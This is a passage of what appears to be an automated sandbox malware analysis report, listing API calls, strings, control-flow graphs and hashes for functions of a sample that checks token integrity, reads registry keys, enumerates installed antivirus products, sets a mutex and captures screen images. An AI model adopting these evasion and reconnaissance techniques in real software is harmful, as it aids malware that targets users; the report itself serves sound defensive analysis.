                                                                                      • Part of subcall function 03076910: GetCurrentProcessId.KERNEL32(2DB1A981,00000000,00000000,75BF73E0,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076938
                                                                                      • Part of subcall function 03076910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076947
                                                                                      • Part of subcall function 03076910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076960
                                                                                      • Part of subcall function 03076910: CloseHandle.KERNEL32(00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 0307696B
                                                                                    • _memset.LIBCMT ref: 03076AC2
                                                                                    • GetVersionExW.KERNEL32(?), ref: 03076ADB
                                                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 03076B12
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 03076B19
                                                                                    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03076B3F
                                                                                    • GetLastError.KERNEL32 ref: 03076B49
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 03076B5D
                                                                                    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03076B85
                                                                                    • GetSidSubAuthorityCount.ADVAPI32 ref: 03076B98
                                                                                    • GetSidSubAuthority.ADVAPI32(00000000), ref: 03076BA6
                                                                                    • LocalFree.KERNEL32(?), ref: 03076BB5
                                                                                    • CloseHandle.KERNEL32(?), ref: 03076BC2
                                                                                    • wsprintfW.USER32 ref: 03076C1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                    • String ID: -N/$NO/$None/%s
                                                                                    • API String ID: 3036438616-3095023699
                                                                                    • Opcode ID: cad77c8fc20be4e859fed33f70f0594f4b0f748b1522d2c65c0f04b2b4f20312
                                                                                    • Instruction ID: ab172de789670cb7c06c4ec83d4a34386504d70e2f41c74bb805c0c84eb0763b
                                                                                    • Opcode Fuzzy Hash: cad77c8fc20be4e859fed33f70f0594f4b0f748b1522d2c65c0f04b2b4f20312
                                                                                    • Instruction Fuzzy Hash: F041C470D0361CAFDB64EB61CC88FEE77BCEB4A304F044496F6069A141DA36D994CBA5
                                                                                    Function 0307AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1349 307ad10-307ad2b 1350 307ad84-307ad8f 1349->1350 1351 307ad2d-307ad5b RegOpenKeyExW 1349->1351 1352 307b845-307b84b call 307ce00 1350->1352 1353 307ad95-307ad9c 1350->1353 1354 307ad5d-307ad73 RegQueryValueExW 1351->1354 1355 307ad79-307ad7e 1351->1355 1359 307b84e-307b854 1352->1359 1356 307afe3-307b09b call 307f707 call 3086770 call 307eff4 call 3087660 call 307f707 call 307cf20 call 307eff4 1353->1356 1357 307adea-307adf1 1353->1357 1354->1355 1355->1350 1355->1359 1407 307b162-307b189 call 307fa29 CloseHandle 1356->1407 1408 307b0a1-307b0ee call 3087660 RegCreateKeyW 1356->1408 1357->1359 1360 307adf7-307ae29 call 307f707 call 3086770 1357->1360 1372 307ae42-307ae4e 1360->1372 1373 307ae2b-307ae3f wsprintfW 1360->1373 1375 307ae50 1372->1375 1376 307ae9a-307aef1 call 307eff4 call 3087660 call 3072ba0 call 307efff * 2 1372->1376 1373->1372 1379 307ae54-307ae5f 1375->1379 1382 307ae60-307ae66 1379->1382 1385 307ae86-307ae88 1382->1385 1386 307ae68-307ae6b 1382->1386 1387 307ae8b-307ae8d 1385->1387 1390 307ae82-307ae84 1386->1390 1391 307ae6d-307ae75 1386->1391 1392 307aef4-307af09 1387->1392 1393 307ae8f-307ae98 1387->1393 1390->1387 1391->1385 1396 307ae77-307ae80 1391->1396 1399 307af10-307af16 1392->1399 1393->1376 1393->1379 1396->1382 1396->1390 1400 307af36-307af38 1399->1400 1401 307af18-307af1b 1399->1401 1406 307af3b-307af3d 1400->1406 1404 307af32-307af34 1401->1404 1405 307af1d-307af25 1401->1405 1404->1406 1405->1400 1410 307af27-307af30 1405->1410 1411 307af3f-307af41 1406->1411 1412 307afae-307afe0 call 307fa29 CloseHandle call 307efff 1406->1412 1426 307b0f0-307b13f call 307eff4 call 3075a30 RegDeleteValueW RegSetValueExW 1408->1426 1427 307b14a-307b15f RegCloseKey call 307fac9 1408->1427 1410->1399 1410->1404 1417 307af55-307af5c 1411->1417 1418 307af43-307af4e call 307efff 1411->1418 1424 307af70-307af74 1417->1424 1425 307af5e-307af69 call 307fac9 1417->1425 1418->1417 1433 307af76-307af7f call 307efff 1424->1433 1434 307af85-307afa9 call 307f020 1424->1434 1425->1424 1426->1427 1445 307b141-307b147 call 307fac9 1426->1445 1427->1407 1433->1434 1434->1376 1445->1427
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0307AD53
                                                                                    • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0307AD73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValue
                                                                                    • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                    • API String ID: 4153817207-1338088003
                                                                                    • Opcode ID: a23e2dc8eed72f4c825e27514fdc982d40844e70ae61f4d06c60bd5c12614a42
                                                                                    • Instruction ID: 3dd7084fb71e0fd80a53f9b992520c9703abbbe30046f89017acc762620d4e03
                                                                                    • Opcode Fuzzy Hash: a23e2dc8eed72f4c825e27514fdc982d40844e70ae61f4d06c60bd5c12614a42
                                                                                    • Instruction Fuzzy Hash: 91C1F1B1E02301ABE710EF24DC45FAB73E8BF94704F080569E9499B381E675E915C7A6
                                                                                    Function 03076150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1448 3076150-30761a5 call 3086770 call 308004b 1453 30761a7-30761ae 1448->1453 1454 3076201-3076228 CoCreateInstance 1448->1454 1455 30761b0-30761b2 call 3076050 1453->1455 1456 3076422-307642f lstrlenW 1454->1456 1457 307622e-3076282 1454->1457 1461 30761b7-30761b9 1455->1461 1459 3076441-3076450 1456->1459 1460 3076431-307643b lstrcatW 1456->1460 1468 307640a-3076418 1457->1468 1469 3076288-30762a2 1457->1469 1462 3076452-3076457 1459->1462 1463 307645a-307647a call 307f00a 1459->1463 1460->1459 1465 30761db-30761ff call 308004b 1461->1465 1466 30761bb-30761d9 lstrcatW * 2 1461->1466 1462->1463 1465->1454 1465->1455 1466->1465 1468->1456 1470 307641a-307641f 1468->1470 1469->1468 1475 30762a8-30762b4 1469->1475 1470->1456 1476 30762c0-3076363 call 3086770 wsprintfW RegOpenKeyExW 1475->1476 1479 30763e9-30763ff 1476->1479 1480 3076369-30763ba call 3086770 RegQueryValueExW 1476->1480 1482 3076402-3076404 1479->1482 1484 30763dc-30763e3 RegCloseKey 1480->1484 1485 30763bc-30763da lstrcatW * 2 1480->1485 1482->1468 1482->1476 1484->1479 1485->1484
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0307618B
                                                                                    • lstrcatW.KERNEL32(030A1F10,0309510C,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 030761CD
                                                                                    • lstrcatW.KERNEL32(030A1F10,0309535C,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 030761D9
                                                                                    • CoCreateInstance.OLE32(03092480,00000000,00000017,0309578C,?,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 03076220
                                                                                    • _memset.LIBCMT ref: 030762CE
                                                                                    • wsprintfW.USER32 ref: 03076336
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0307635F
                                                                                    • _memset.LIBCMT ref: 03076376
                                                                                      • Part of subcall function 03076050: _memset.LIBCMT ref: 0307607C
                                                                                      • Part of subcall function 03076050: CreateToolhelp32Snapshot.KERNEL32 ref: 03076088
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                    • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                    • API String ID: 1221949200-1583895642
                                                                                    • Opcode ID: b1e57abc67e97b1b4188b789ee13b6cfb5f29a613a1028836fb31880505d6b31
                                                                                    • Instruction ID: 26226088bfef6c5f3498ef60b8fea06ffab35cff9729d1c10be6975178149320
                                                                                    • Opcode Fuzzy Hash: b1e57abc67e97b1b4188b789ee13b6cfb5f29a613a1028836fb31880505d6b31
                                                                                    • Instruction Fuzzy Hash: 7B8193B1A02628AFDB24DB54CC40FAEB7B8EB48704F0445C9F719AB142D6759A41CFA8
                                                                                    Function 0040C490 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1486 40c490-40c4b9 call 4087fc 1489 40c4d0-40c4e5 call 4097c8 call 40bcc4 1486->1489 1490 40c4bb-40c4ce GetModuleFileNameW 1486->1490 1491 40c4ea-40c4f2 1489->1491 1490->1491 1494 40c4f8-40c519 RegOpenKeyExW 1491->1494 1495 40c69f-40c6b4 call 408718 1491->1495 1498 40c5b9-40c5f3 call 40c2a0 RegQueryValueExW 1494->1498 1499 40c51f-40c53b RegOpenKeyExW 1494->1499 1507 40c5f5-40c626 call 405490 RegQueryValueExW call 40982c 1498->1507 1508 40c628-40c642 RegQueryValueExW 1498->1508 1499->1498 1500 40c53d-40c559 RegOpenKeyExW 1499->1500 1500->1498 1503 40c55b-40c577 RegOpenKeyExW 1500->1503 1503->1498 1506 40c579-40c595 RegOpenKeyExW 1503->1506 1506->1498 1509 40c597-40c5b3 RegOpenKeyExW 1506->1509 1511 40c673-40c684 1507->1511 1508->1511 1512 40c644-40c66e call 405490 RegQueryValueExW call 40982c 1508->1512 1509->1495 1509->1498 1516 40c686-40c689 call 4054ac 1511->1516 1517 40c68e-40c697 RegCloseKey 1511->1517 1512->1511 1516->1517
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040C6B5,?,?), ref: 0040C4C9
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C512
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C534
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040C552
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040C570
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040C58E
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040C5AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5), ref: 0040C5EC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001), ref: 0040C617
                                                                                    • RegCloseKey.ADVAPI32(?,0040C69F,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales), ref: 0040C692
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
                                                                                    • Instruction ID: b87a276e91c0abd92e6ddb5251d81d319347be4625686c9aa575414df8f97b10
                                                                                    • Opcode Fuzzy Hash: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
                                                                                    • Instruction Fuzzy Hash: B251F575A50208FEDB20EB95CC82FAE77ECDB08704F5045BBB604F62C1D6789A449B5D
                                                                                    Function 03075F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1523 3075f40-3075f7b CreateMutexW GetLastError 1524 3075f7d 1523->1524 1525 3075f9b-3075fa2 1523->1525 1528 3075f80-3075f99 Sleep CreateMutexW GetLastError 1524->1528 1526 3075fa4-3075faa 1525->1526 1527 3076003-307602d GetModuleHandleW GetConsoleWindow call 307e4f0 1525->1527 1529 3075fb0-3075fe1 call 3086770 lstrlenW call 3076d70 1526->1529 1534 307602f-3076045 call 307f00a 1527->1534 1535 3076048-307604f call 307e850 1527->1535 1528->1525 1528->1528 1542 3075ff3-3076001 Sleep 1529->1542 1543 3075fe3-3075ff1 lstrcmpW 1529->1543 1542->1527 1542->1529 1543->1527 1543->1542
                                                                                    APIs
                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,2024.12.25), ref: 03075F66
                                                                                    • GetLastError.KERNEL32 ref: 03075F6E
                                                                                    • Sleep.KERNEL32(000003E8), ref: 03075F85
                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,2024.12.25), ref: 03075F90
                                                                                    • GetLastError.KERNEL32 ref: 03075F92
                                                                                    • _memset.LIBCMT ref: 03075FB9
                                                                                    • lstrlenW.KERNEL32(?), ref: 03075FC6
                                                                                    • lstrcmpW.KERNEL32(?,03095328), ref: 03075FED
                                                                                    • Sleep.KERNEL32(000003E8), ref: 03075FF8
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 03076005
                                                                                    • GetConsoleWindow.KERNEL32 ref: 0307600F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                    • String ID: 2024.12.25$key$open
                                                                                    • API String ID: 2922109467-228899315
                                                                                    • Opcode ID: 3b7d99d43ff3704659f2ba6b747e0a1d578b1d09ee2cab37c29f3d0138345d14
                                                                                    • Instruction ID: a50c77b84664fbd186a526320e9bebcbc6ab4ff759af401e973e622db429b3b8
                                                                                    • Opcode Fuzzy Hash: 3b7d99d43ff3704659f2ba6b747e0a1d578b1d09ee2cab37c29f3d0138345d14
                                                                                    • Instruction Fuzzy Hash: D621E772D0A309AFE614EB64EC45B9E73D8ABC4704F14481AE6049B1C1DBB5E909C7EB
                                                                                    Function 004221FC Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 132libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: 2$2$2$3$3$_$e$r$s$s$u$w
                                                                                    • API String ID: 1029625771-3744707172
                                                                                    • Opcode ID: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
                                                                                    • Instruction ID: 27e9f1c01ee5c9c2bc4191f5b7c330e1c9f60075257b6c3fc99aa86c3d286dbd
                                                                                    • Opcode Fuzzy Hash: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
                                                                                    • Instruction Fuzzy Hash: AA518BB5E10248AFDB00DFA1D9819BE7F71AB45304F50809DE9481F342E6B99B16CBA1
                                                                                    Function 030762B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 030762CE
                                                                                    • wsprintfW.USER32 ref: 03076336
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0307635F
                                                                                    • _memset.LIBCMT ref: 03076376
                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 030763B2
                                                                                    • lstrcatW.KERNEL32(030A1F10,?), ref: 030763CE
                                                                                    • lstrcatW.KERNEL32(030A1F10,0309535C), ref: 030763DA
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 030763E3
                                                                                    • lstrlenW.KERNEL32(030A1F10,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 03076427
                                                                                    • lstrcatW.KERNEL32(030A1F10,030953D4,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 0307643B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                    • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                    • API String ID: 1671694837-1583895642
                                                                                    • Opcode ID: d3500597e9f0de30b5f556fbf75ef8b8db5340a52c4155b0b347c8092c7493ae
                                                                                    • Instruction ID: a262b490043bd0cfd999fc0f304e2001f5f97680e64d9433a9a93639965654f6
                                                                                    • Opcode Fuzzy Hash: d3500597e9f0de30b5f556fbf75ef8b8db5340a52c4155b0b347c8092c7493ae
                                                                                    • Instruction Fuzzy Hash: 5941A4F1A01668AFDB24DB94CC50FEEB7B8AB48704F0441C9F349A7182D6759A80CF68
                                                                                    Function 0307C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000002,?,2DB1A981,?,00000000,?), ref: 0307C09E
                                                                                    • GlobalLock.KERNEL32 ref: 0307C0AA
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0307C0BF
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0307C0D5
                                                                                    • EnterCriticalSection.KERNEL32(0309FB64), ref: 0307C113
                                                                                    • LeaveCriticalSection.KERNEL32(0309FB64), ref: 0307C124
                                                                                      • Part of subcall function 03079DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03079E04
                                                                                      • Part of subcall function 03079DE0: GdipDisposeImage.GDIPLUS(?), ref: 03079E18
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0307C14C
                                                                                      • Part of subcall function 0307A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0307A48D
                                                                                      • Part of subcall function 0307A460: _free.LIBCMT ref: 0307A503
                                                                                    • GetHGlobalFromStream.OLE32(?,?), ref: 0307C16D
                                                                                    • GlobalLock.KERNEL32 ref: 0307C177
                                                                                    • GlobalFree.KERNEL32 ref: 0307C18F
                                                                                      • Part of subcall function 03079BA0: DeleteObject.GDI32 ref: 03079BD2
                                                                                      • Part of subcall function 03079BA0: EnterCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079BE3
                                                                                      • Part of subcall function 03079BA0: EnterCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079BF8
                                                                                      • Part of subcall function 03079BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03079B7B), ref: 03079C04
                                                                                      • Part of subcall function 03079BA0: LeaveCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079C15
                                                                                      • Part of subcall function 03079BA0: LeaveCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079C1C
                                                                                    • GlobalSize.KERNEL32(00000000), ref: 0307C1A5
                                                                                    • GlobalUnlock.KERNEL32(?), ref: 0307C221
                                                                                    • GlobalFree.KERNEL32 ref: 0307C249
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                    • String ID:
                                                                                    • API String ID: 1483550337-0
                                                                                    • Opcode ID: 3cb2941e5f7c67e7c26ba028ae734ded72ac28e3783a4e698a2aaa9ef9ae6846
                                                                                    • Instruction ID: 500e258025cf5250dfa45f8ef245df4a32205c04ee77da8b3adafbc469acd3dd
                                                                                    • Opcode Fuzzy Hash: 3cb2941e5f7c67e7c26ba028ae734ded72ac28e3783a4e698a2aaa9ef9ae6846
                                                                                    • Instruction Fuzzy Hash: 5B6139B5D0221CAFDB10EFA8D8849DEBBB8FF89710F10852AE515EB241DB359905CF94
                                                                                    Function 03076490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 030764C2
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 030764E2
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 03076524
                                                                                    • _memset.LIBCMT ref: 03076560
                                                                                    • _memset.LIBCMT ref: 0307658E
                                                                                    • RegEnumKeyExW.ADVAPI32 ref: 030765BA
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 030765C3
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 030765D5
                                                                                    • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03076625
                                                                                    • lstrlenW.KERNEL32(?), ref: 03076635
                                                                                    Strings
                                                                                    • Software\Tencent\Plugin\VAS, xrefs: 030764D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                    • String ID: Software\Tencent\Plugin\VAS
                                                                                    • API String ID: 2921034913-3343197220
                                                                                    • Opcode ID: a668d158e02cd3eef8b045848c8f36a7ef2401f34125292b56aada0c4afa846a
                                                                                    • Instruction ID: 53ba75839a621c5c3bce739f267092d9167a78b9c45b0d5ac6e9f45cec53a593
                                                                                    • Opcode Fuzzy Hash: a668d158e02cd3eef8b045848c8f36a7ef2401f34125292b56aada0c4afa846a
                                                                                    • Instruction Fuzzy Hash: B241B9F5E4121DBBDB34EB54CD85FEA737CEB44600F404599E309B7041EA719A858FA8
                                                                                    Function 10015820 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 357filesynchronizationCOMMON
